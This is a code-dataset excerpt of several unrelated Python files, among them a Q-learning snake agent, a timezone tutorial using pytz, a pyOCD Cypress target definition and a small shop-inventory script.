if DoubleAdvance and position[0] - 2 < 8 and board[position[0] - 2][position[1]].getName() == ' ':
LegalMovesListNull.append(board[position[0] - 2][position[1]])
if position[0] - 1 > -1 and position[1] + 1 < 8 and board[position[0] - 1][position[1] + 1].getName() != ' ' and board[position[0] - 1][position[1] + 1].getColor() != tile.getColor():
LegalMovesListDestroyable.append(board[position[0] - 1][position[1] + 1])
if position[0] - 1 > -1 and position[1] - 1 > -1 and board[position[0] - 1][position[1] - 1].getName() != ' ' and board[position[0] - 1][position[1] - 1].getColor() != tile.getColor():
LegalMovesListDestroyable.append(board[position[0] - 1][position[1] - 1])
self.LegalMovesList = [LegalMovesListNull, LegalMovesListDestroyable]
return self.LegalMovesList
|
20,789 | 7f49ba6fdd1bd76ca18111263efae712d7ad8312 | import numpy as np
from collections import defaultdict
import pickle
from time import time
from Game import Game
from Snake import Snake
class QLearningModel:
def __init__(self):
self.rewardAlive = -1
self.rewardKill = -10000
self.rewardScore = 50000000
# learningRate
self.alpha = 0.00001
# ZerfallsRate
self.alphaD = 0.999
# discount factor
self.gamma = 0.9
# randomness
self.e = 0.5
self.ed = 1.3
self.emin = 0.0001
try:
with open("Q-distance.pickle", "rb") as file:
self.Q = defaultdict(lambda: [0, 0, 0, 0], pickle.load(file))
except:
self.Q = defaultdict(lambda: [0, 0, 0, 0])
# UP LEFT DOWN RIGHT
print("NEW Q")
self.lastMoves = ""
self.oldState = None
self.oldAction = None
self.gameCounter = 0
self.gameScores = []
self.start = 0
self.end = 0
def generatePrediction(self, state):
estReward = self.Q[state]
prevReward = self.Q[self.oldState]
index = 0
if self.oldAction == 'U':
index = 0
if self.oldAction == 'L':
index = 1
if self.oldAction == 'D':
index = 2
if self.oldAction == 'R':
index = 3
reward = (-10) / 50
prevReward[index] = (1 - self.alpha) * prevReward[index] + \
self.alpha * (reward + self.gamma * max(estReward))
self.Q[self.oldState] = prevReward
self.oldState = state
basedOnQ = np.random.choice([True, False], p=[1 - self.e, self.e])
if basedOnQ == False:
choice = np.random.choice(['U', 'L', 'D', 'R'], p=[0.25, 0.25, 0.25, 0.25])
self.oldAction = choice
return choice
else:
if estReward[0] > estReward[1] and estReward[0] > estReward[2] and estReward[0] > estReward[3]:
self.oldAction = 'U'
return 0
if estReward[1] > estReward[0] and estReward[1] > estReward[2] and estReward[1] > estReward[3]:
self.oldAction = 'L'
return 3
if estReward[2] > estReward[0] and estReward[2] > estReward[1] and estReward[2] > estReward[3]:
self.oldAction = 'D'
return 2
if estReward[3] > estReward[0] and estReward[3] > estReward[1] and estReward[3] > estReward[2]:
self.oldAction = 'R'
return 1
else:
choice = np.random.choice(['U', 'L', 'D', 'R'], p=[0.25, 0.25, 0.25, 0.25])
self.oldAction = choice
return choice
def onGameOver(self, score):
self.gameScores.append(score)
# update Q of previous state (state which lead to gameOver)
prevReward = self.Q[self.oldState]
if self.oldAction is None:
index = 0
if self.oldAction == 'U':
index = 0
if self.oldAction == 'L':
index = 1
if self.oldAction == 'D':
index = 2
if self.oldAction == 'R':
index = 3
prevReward[index] = (1 - self.alpha) * prevReward[index] + self.alpha * self.rewardKill
self.Q[self.oldState] = prevReward
self.oldState = None
self.oldAction = None
# save Q as pickle
if self.gameCounter % 200 == 0:
with open("Q-distance.pickle", "wb") as file:
pickle.dump(dict(self.Q), file)
print("+++++++++ Pickle saved +++++++++")
# show some stats
if self.gameCounter % 100 == 1:
self.end = time()
timeD = self.end - self.start
print(str(self.gameCounter) + " : " + "\t" + 'meanScore: ' + str(
np.mean(self.gameScores[-100:])) + "| HighScore: " + str(
np.max(self.gameScores)) + "| time for 10 games: " + str(round(timeD * 10) / 100))
self.start = time()
# print coeffients
if self.gameCounter % 100 == 0:
print("alpha:", self.alpha)
print("e:", self.e)
print("gamma:", self.gamma)
# decrease alpha / e per 100 moves
if self.gameCounter % 100 == 0:
self.alpha = self.alpha * self.alphaD
if self.e > self.emin:
self.e = self.e / self.ed
self.gameCounter += 1
def onScore(self, state):
estReward = self.Q[state]
prevReward = self.Q[self.oldState]
if self.oldAction == 'U':
index = 0
if self.oldAction == 'L':
index = 1
if self.oldAction == 'D':
index = 2
if self.oldAction == 'R':
index = 3
prevReward[index] = (1 - self.alpha) * prevReward[index] + \
self.alpha * (self.rewardScore + self.gamma * max(estReward))
self.Q[self.oldState] = prevReward
# Difficulty settings
# Easy -> 10
# Medium -> 25
# Hard -> 40
# Harder -> 60
# Impossible-> 120
difficulty = 50
# Window size
frame_size_x = 800
frame_size_y = 500
qLearn = QLearningModel()
pixelSize = 50
while True:
snake = Snake(100, 50, [[100, 50], [100 - pixelSize, 50], [100 - (2 * pixelSize), 50]], [100, 50])
game = Game(frame_size_x, frame_size_y, difficulty, snake, pixelSize)
while game.snake.alive:
game.step(qLearn, "QLearning")
|
20,790 | 46e0380f4a7742882048ea23abca8da693064f27 | import MFCC
import audio
import numpy as np
import scipy.io.wavfile as wav
from scipy.io import loadmat
import sounddevice as sd
import threading
import ml
import os
import sys
import glob
def main():
theta1 = loadmat('ml.mat')['theta1'];
theta2 = loadmat('ml.mat')['theta2'];
"""Xtest = [];
ytest = [];
nspeakers = theta2.shape[0];
folders = os.listdir("wav")
for i in range(5):
folder = folders[i];
print(folder)
files = [f for f in glob.glob("wav/"+folder + "/" + "**/*.wav", recursive=True)]
sztraining = int(len(files)*0.6);
for fid in range(sztraining, len(files)):
sample_rate, signal = wav.read(files[fid])
signal = signal[0:int(2 * sample_rate)]
mfcc = MFCC.main(signal, sample_rate)
Xtest.append(mfcc)
ytest.append(i)
ytest = np.array(ytest)
Xtest = np.array(Xtest)
pred = [];
for i in range(len(Xtest)):
pred.append(ml.predictWAV(theta1, theta2, Xtest[i])[0])
print(np.mean(pred == ytest.flatten()) * 100)"""
signal = []
sample_rate = 16000
#th = threading.Thread(target=audio.plot_audio, args=(1,));
#th.start()
while True:
cmd = input("Digite um comando");
print("CMDZAO = " + str(cmd))
if cmd == "record":
seconds = 7
print("recording...")
signal = sd.rec(int(seconds * sample_rate), samplerate = sample_rate, channels = 1)
sd.wait()
elif cmd == "who":
if not len(signal):
print("no signal")
continue
sd.play(signal, sample_rate)
signal = signal[0:int(2 * sample_rate)]
mfcc = MFCC.main(signal, sample_rate)
mlres = ml.predictWAV(theta1, theta2, mfcc)
print("user id: {}".format(mlres[0]))
elif cmd == "exit":
break
else:
print("not found.")
return 0;
if __name__ == "__main__":
sys.exit(main())
|
20,791 | cebcf2979610be6b8049ec9a6adf1737d06f52d9 | from typing import List, Dict, Tuple
from sharpy.events import UnitDestroyedEvent
from sharpy.managers import ManagerBase
from sc2 import UnitTypeId, Result
from sc2.unit import Unit
from sharpy.managers.enemy_units_manager import ignored_types
class LostUnitsManager(ManagerBase):
"""Keeps track of lost units. Both ours and enemies."""
def __init__(self):
super().__init__()
self.hallucination_tags: List[int] = []
self._my_lost_units: Dict[UnitTypeId, List[Unit]] = {}
self._enemy_lost_units: Dict[UnitTypeId, List[Unit]] = {}
async def start(self, knowledge: "Knowledge"):
await super().start(knowledge)
knowledge.register_on_unit_destroyed_listener(self.on_unit_destroyed)
async def update(self):
pass
async def post_update(self):
pass
def on_unit_destroyed(self, event: UnitDestroyedEvent):
if not event.unit:
# Event is not useful if we do not know the unit.
return
unit = event.unit
type_id = event.unit.type_id
if type_id in ignored_types or unit.tag in self.hallucination_tags:
return
# Find a mapping if there is one, or use the type_id as it is
real_type = self.unit_values.real_type(type_id)
if unit.is_mine:
self._my_lost_units.setdefault(real_type, []).append(unit)
self.print(f"Own unit destroyed, unit {unit}")
elif unit.is_enemy:
self._enemy_lost_units.setdefault(real_type, []).append(unit)
self.print(f"Enemy unit destroyed, unit {unit}")
else:
self.print(f"Unknown owner {unit.owner_id} for unit {unit}")
def calculate_own_lost_resources(self) -> Tuple[int, int]:
"""Calculates lost resources for our own bot. Returns a tuple with (unit_count, minerals, gas)."""
return self._calculate_lost_resources(self._my_lost_units)
def calculate_enemy_lost_resources(self) -> Tuple[int, int]:
"""Calculates lost resources for an enemy. Returns a tuple with (unit_count, minerals, gas)."""
return self._calculate_lost_resources(self._enemy_lost_units)
def own_lost_type(self, unit_type: UnitTypeId) -> int:
real_type = self.unit_values.real_type(unit_type)
return len(self._my_lost_units.get(real_type, []))
def enemy_lost_type(self, unit_type: UnitTypeId) -> int:
real_type = self.unit_values.real_type(unit_type)
return len(self._enemy_lost_units.get(real_type, []))
def _calculate_lost_resources(self, lost_units: Dict[UnitTypeId, List[Unit]]) -> tuple:
lost_minerals = 0
lost_gas = 0
for unit_type in lost_units:
count = len(lost_units.get(unit_type, []))
minerals = self.unit_values.minerals(unit_type) * count
gas = self.unit_values.gas(unit_type) * count
lost_minerals += minerals
lost_gas += gas
return lost_minerals, lost_gas
async def on_end(self, game_result: Result):
self.print_contents()
def print_contents(self):
self.print_end(f"My lost units minerals and gas: {self.calculate_own_lost_resources()}")
self.print_end(f"Enemy lost units minerals and gas: {self.calculate_enemy_lost_resources()}")
def print_end(self, msg: str):
self.knowledge.print(msg, "LostUnitsContents", stats=False)
def get_own_enemy_lost_units(self) -> Tuple[Dict[UnitTypeId, List[Unit]], Dict[UnitTypeId, List[Unit]]]:
"""Get tuple with own and enemy lost units"""
return (self._my_lost_units, self._enemy_lost_units)
|
20,792 | d55a28f57f92d37f053db907179b683e78d3e7d8 | import sys
import math
points = []
with open('day_10.txt', 'r') as fp:
for line in fp:
line = line.strip()
parts = line.split("<")
x = int(parts[1].split(',')[0])
y = int(parts[1].split(',')[1].split('>')[0])
vel_x = int(parts[2].split(',')[0])
vel_y = int(parts[2].split(',')[1].split('>')[0])
points.append((x, y, vel_x, vel_y))
cur_points = []
for point in points:
cur_points.append((point[0], point[1]))
def move_points(cur_points):
return list(map(lambda z: (z[0][0] + z[1][2], z[0][1] + z[1][3]), zip(cur_points, points)))
def get_dim(cur_points):
max_x, max_y, min_x, min_y = -math.inf, -math.inf, math.inf, math.inf
for point in cur_points:
max_x = max(max_x, point[0])
max_y = max(max_y, point[1])
min_x = min(min_x, point[0])
min_y = min(min_y, point[1])
return min_x, max_x, min_y, max_y
def print_points(cur_points):
min_x, max_x, min_y, max_y = get_dim(cur_points)
board = []
for i in range(0, abs(max_x - min_x) + 1):
board.append(["." for _ in range(min_y, max_y + 1)])
for point in cur_points:
board[point[0] - min_x][point[1] - min_y] = "#"
for y in range(0, abs(min_y - max_y) + 1):
for x in range(0, abs(min_x - max_x) + 1):
sys.stdout.write(board[x][y])
sys.stdout.write('\n')
def size_of_points(cur_points):
min_x, max_x, min_y, max_y = get_dim(cur_points)
return abs(max_x - min_x) + abs(max_y - min_y)
size_decreasing = True
last_size = math.inf
prev_points = None
seconds = 0
while size_decreasing:
seconds += 1
prev_points = cur_points
cur_points = move_points(cur_points)
size = size_of_points(cur_points)
size_decreasing = last_size > size
last_size = size
print_points(prev_points)
print(seconds - 1)
print(size_of_points(prev_points))
|
20,793 | a3bf0f0bfdcd171227a0f2f1950bb3ea065b6a66 | import pandas as pd
from sklearn.model_selection import train_test_split
#Change file name
#Change Temp to Value.
nyc = pd.read_csv('ave_yearly_temp_nyc_1895-2017.csv')
#nyc.columns = ['Date', 'Temperature', 'Anomaly']
#rint(nyc.head(3)) # this displays the 1st 3 samples
#print(nyc.Date.values)
#print(nyc.Date.values.reshape(-1,1))
x_train, x_test, y_train, y_test = train_test_split( # x is the data # y is the target #line 18 is the issue
nyc.Date.values.reshape(-1,1), nyc.Value.values,
random_state=11)
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
lr.fit(X=x_train, y=y_train)
print(lr.coef_)
print(lr.intercept_)
predicted = lr.predict(x_test)
expected = y_test
for p, e in zip(predicted[::5], expected[::5]):
print(f"predicted: {p:.2f}, expected: {e: .2f}")
predict = (lambda x: lr.coef_ * x + lr.intercept_)
print(predict(2020))
print(predict(1890))
print(predict(2021))
import seaborn as sns
axes = sns.scatterplot(
data=nyc,
x='Date',
y='Value',
hue='Value',
palette='winter',
legend=False
)
axes.set_ylim(10,70)
import numpy as np
x = np.array([min(nyc.Date.values), max(nyc.Date.values)])
print(x)
y = predict(x)
print(y)
import matplotlib.pyplot as plt
line = plt.plot(x,y)
plt.show()
# the 1st linear regression was for January ( tracks all jan temps)
# the 2nd linear regression was for the end of the year avg temp. As the year goes on
# the temp increases.
#
# (the '12' and the end of each year is show that it's for the whole year) |
20,794 | a413b150a7e0a9d6d92a6e8fc27a62c507109631 | '''Timezones'''
# A reminder: it's best to avoid working with timezones. Instead, the best
# practice would be to convert any times/dates to UTC at the start, do all
# your processing in UTC and then convert back to timezones only if you have
# to at the end for the user.
# As it turns out, the web browser knows the user's timezone, and exposes it
# through the standard date and time JavaScript APIs. A good way of utilizing
# this is to let the conversion from UTC to a local timezone happen in the
# web client using JavaScript. There is a small open-source JavaScript library
# called moment.js that handles this very well. Though not demonstrated in this
# file, note that there is a Flask extension called Flask-Moment that makes it
# easy to incorporate moment.js into your Flask app.
# pytz module
# -----------------------------------------------------------------------------
import datetime
import pytz
# FYI pytz pulls timezone information from this database:
# https://www.iana.org/time-zones
# see all timezones:
for x in pytz.all_timezones:
print(x)
# see all country codes:
for x in sorted(pytz.country_names):
print(x, ':', pytz.country_names[x])
# see all country names:
for x in sorted(pytz.country_names):
print(f'{x}: {pytz.country_names[x]}: {pytz.country_timezones.get(x)}')
# see names, zones and their times:
for x in sorted(pytz.country_names):
print(f'{x}: {pytz.country_names[x]}')
if x in pytz.country_timezones:
for zone in sorted(pytz.country_timezones[x]):
tz_to_display = pytz.timezone(zone)
local_time = datetime.datetime.now(tz=tz_to_display)
print(f'\t{zone}: {local_time}')
else:
print('\tNo timezone defined')
# pytz example
# -----------------------------------------------------------------------------
import datetime
import pytz
country = "Europe/Moscow"
tz = pytz.timezone(country)
world_time = datetime.datetime.now(tz=tz)
print(f'UTC is {datetime.datetime.utcnow()}')
# UTC is 2018-03-28 19:39:09.028962
print(f'The time in {country} is {world_time}')
# The time in Europe/Moscow is 2018-03-28 22:39:09.028943+03:00
print(f'In {country} it is {world_time.strftime("%A %x %X")} - {world_time.tzname()}')
# In Europe/Moscow it is Wednesday 03/28/18 22:39:09 - MSK
# convert a naive datetime to an aware datetime
# -----------------------------------------------------------------------------
import datetime
import pytz
naive_local_time = datetime.datetime.now()
naive_utc_time = datetime.datetime.utcnow()
print(f'Naive local time: {naive_local_time}')
print(f'Naive UTC: {naive_utc_time}')
# Naive local time: 2018-03-28 12:39:09.029068
# Naive UTC: 2018-03-28 19:39:09.0290701
# When these next two print you can tell they are aware because they now
# include an offset at the end. Both will show the same time zone and same
# offset (+00:00, UTC) because the naive datetimes we supplied to it don't
# carry that information. The third example shows how to get the correct local
# offset and time zone:
aware_local_time = pytz.utc.localize(naive_local_time)
aware_utc_time = pytz.utc.localize(naive_utc_time)
aware_local_time_zone = pytz.utc.localize(naive_utc_time).astimezone()
print(f'Aware local time: {aware_local_time} - '
f'time zone: {aware_local_time.tzinfo}')
# Aware local time: 2018-03-28 12:39:09.029068+00:00 - time zone: UTC
print(f'Aware UTC: {aware_utc_time} - '
f'time zone: {aware_utc_time.tzinfo}')
# Aware UTC: 2018-03-28 19:39:09.029070+00:00 - time zone: UTC
print(f'Aware local time: {aware_local_time_zone} - '
f'time zone: {aware_local_time_zone.tzinfo}')
# Aware local time: 2018-03-28 12:39:09.029070-07:00 - time zone: PDT
# date in a timezone from epoch
# -----------------------------------------------------------------------------
# Use time stamps (seconds since the epoch) to convert to actual date.
# For this example we'll be supplying the timezone since an epoch number could
# be from anywhere. This particular timestamp is the hour before DST in the UK
# on October 25, 2015. You will see the difference before and after the DST in
# the offset.
s = 1445733000
t = s + (60 * 60)
tz = pytz.timezone("Canada/Pacific")
dt1 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(s)).astimezone(tz)
dt2 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(t)).astimezone(tz)
print(f'{s} seconds since epoch is {dt1}')
print(f'{t} seconds since epoch is {dt2}')
# 1445733000 seconds since epoch is 2015-10-24 17:30:00-07:00
# 1445736600 seconds since epoch is 2015-10-24 18:30:00-07:00
|
20,795 | d9d06321740ed494000f57243cc7d9febb4c7b00 | from game_config import GameConfig
from game_board import GameBoard
from pieces import Pawn, Rook, Knight, Bishop, Queen, King
from chess_operations import GameOps |
20,796 | b6892795aa1a67b7afa3bd9c126c4f836be6cd97 | # pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from time import sleep
from .flash_algo_CY8C6xxA import flash_algo as flash_algo_main
from .flash_algo_CY8C6xxA_WFLASH import flash_algo as flash_algo_work
from .flash_algo_CY8C6xxA_SFLASH import flash_algo as flash_algo_sflash
from .flash_algo_CY8C6xxA_SMIF_S25FL512S import flash_algo as flash_algo_smif
from ...core import exceptions
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ...core.target import Target
from ...coresight.cortex_m import CortexM
from ...utility.timeout import Timeout
LOG = logging.getLogger(__name__)
ERASE_ALL_WEIGHT = 0.5 # Time it takes to perform a chip erase
ERASE_SECTOR_WEIGHT = 0.05 # Time it takes to erase a page
PROGRAM_PAGE_WEIGHT = 0.07 # Time it takes to program a page (Not including data transfer time)
class CY8C6xxA(CoreSightTarget):
VENDOR = "Cypress"
memoryMap = MemoryMap(
RomRegion(start=0x00000000, length=0x20000),
FlashRegion(start=0x10000000, length=0x200000, blocksize=0x200,
is_boot_memory=True,
erased_byte_value=0,
algo=flash_algo_main,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x14000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
algo=flash_algo_work,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x16000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
is_testable=False,
algo=flash_algo_sflash,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x18000000, length=0x4000000, blocksize=0x40000, page_size=0x1000,
is_boot_memory=False,
erased_byte_value=0xFF,
is_testable=False,
is_powered_on_boot=False,
algo=flash_algo_smif,
erase_all_weight=140,
erase_sector_weight=1,
program_page_weight=1),
RamRegion(start=0x08000000, length=0x10000)
)
def __init__(self, link, memmap = memoryMap):
super(CY8C6xxA, self).__init__(link, memmap)
def create_init_sequence(self):
seq = super(CY8C6xxA, self).create_init_sequence()
seq.replace_task('create_cores', self.create_cy8c6xx7_core)
return seq
def create_cy8c6xx7_core(self):
core0 = CortexM_CY8C6xxA(self.session, self.aps[1], self.memory_map, 0)
core0.default_reset_type = self.ResetType.SW_SYSRESETREQ
core1 = CortexM_CY8C6xxA(self.session, self.aps[2], self.memory_map, 1)
core1.default_reset_type = self.ResetType.SW_SYSRESETREQ
self.aps[1].core = core0
self.aps[2].core = core1
core0.init()
core1.init()
self.add_core(core0)
self.add_core(core1)
class CortexM_CY8C6xxA(CortexM):
def reset(self, reset_type=None):
self.session.notify(Target.EVENT_PRE_RESET, self)
self._run_token += 1
if reset_type is Target.ResetType.HW:
self.session.probe.reset()
sleep(0.5)
self._ap.dp.init()
self._ap.dp.power_up_debug()
self.fpb.enable()
else:
if reset_type is Target.ResetType.SW_VECTRESET:
mask = CortexM.NVIC_AIRCR_VECTRESET
else:
mask = CortexM.NVIC_AIRCR_SYSRESETREQ
try:
self.write_memory(CortexM.NVIC_AIRCR, CortexM.NVIC_AIRCR_VECTKEY | mask)
self.flush()
except exceptions.TransferError:
self.flush()
with Timeout(5.0) as t_o:
while t_o.check():
try:
dhcsr_reg = self.read32(CortexM.DHCSR)
if (dhcsr_reg & CortexM.S_RESET_ST) == 0:
break
except exceptions.TransferError:
self.flush()
self._ap.dp.init()
self._ap.dp.power_up_debug()
sleep(0.01)
self.session.notify(Target.EVENT_POST_RESET, self)
def wait_halted(self):
with Timeout(5.0) as t_o:
while t_o.check():
try:
if not self.is_running():
break
except exceptions.TransferError:
self.flush()
sleep(0.01)
else:
raise exceptions.TimeoutError("Timeout waiting for target halt")
def reset_and_halt(self, reset_type=None):
self.halt()
self.reset(reset_type)
sleep(0.5)
self.halt()
self.wait_halted()
if self.core_number == 0:
vtbase = self.read_memory(0x40201120) # VTBASE_CM0
elif self.core_number == 1:
vtbase = self.read_memory(0x40200200) # VTBASE_CM4
else:
raise exceptions.TargetError("Invalid CORE ID")
vtbase &= 0xFFFFFF00
if vtbase < 0x10000000 or vtbase > 0x18000000:
LOG.info("Vector Table address invalid (0x%08X), will not halt at main()", vtbase)
return
entry = self.read_memory(vtbase + 4)
if entry < 0x10000000 or entry > 0x18000000:
LOG.info("Entry Point address invalid (0x%08X), will not halt at main()", entry)
return
self.set_breakpoint(entry)
self.bp_manager.flush()
self.reset(self.ResetType.SW_SYSRESETREQ)
sleep(0.2)
self.wait_halted()
self.remove_breakpoint(entry)
self.bp_manager.flush()
|
20,797 | c0d4e84f8cef1ba1363336b503918a3d5f0c1d80 | l=int(input())
ll=l/3
print(ll**3) |
20,798 | 11a50ff14f89220476887abf108d3fe776e51c58 | from django.urls import path
from django.contrib import admin
from Admin_app import views
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.riders,name='riders'),
]
|
20,799 | 528772312899e0510beb64e76f67898e9dd148c3 | products = [ ("Ultrasonic range finder", 2.50, 4), ("Servo motor", 14.99, 10
),("Servo controller", 44.95, 5), ("Microcontroller Board", 34.95
, 7), ("Laser range finder", 149,99, 2), ("Lithium Polymer Battery"
, 8.99, 8)
]
class Product:
def __init__ (self, name, price, productquantity):
self.name = name
self.price = price
self.productquantity = productquantity
def stock(self, amount):
if self.productquantity >= amount:
return True
return False
def cost(self, count):
return self.price * count
def remainder(self, count):
self.productquantity = self.productquantity - count
return self.productquantity
Finder = Product(products[0][0],products[0][1],products[0][2])
Motor = Product(products[1][0],products[1][1],products[1][2])
Controller = Product(products[2][0],products[2][1],products[2][2])
Board = Product(products[3][0],products[3][1],products[3][2])
lazer = Product(products[4][0],products[4][1],products[4][2])
battery = Product(products[5][0],products[5][1],products[5][2])
prodList = [Finder,Motor,Controller,Board,lazer,battery]
def printStock():
print()
print("Available Products")
print("------------------")
for i in range(0,len(products)):
if prodList[i].productquantity > 0:
print(str(i)+")",prodList[i].name, "$", prodList[i].price)
print()
def main():
cash = float(input("How much money do you have? $ "))
while cash > 0:
printStock()
vals = input("Enter product ID and quantity you wish to buy: ").split(" ")
if vals[0] == "quit":
break
prodId = int(vals[0])
count = int(vals[1])
if prodList[prodId].stock(count):
if cash >= prodList[prodId].price:
prodList[prodId].remainder(count)
cash -= prodList[prodId].cost(count)
print("You purchased", count, prodList[prodId].name+".")
print("You have $ ", "{0:.2f}".format(cash), "remaining.")
else:
print("Sorry, you cannot afford that product.")
else:
print("Sorry, we are sold out of", prodList[prodId].name)
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.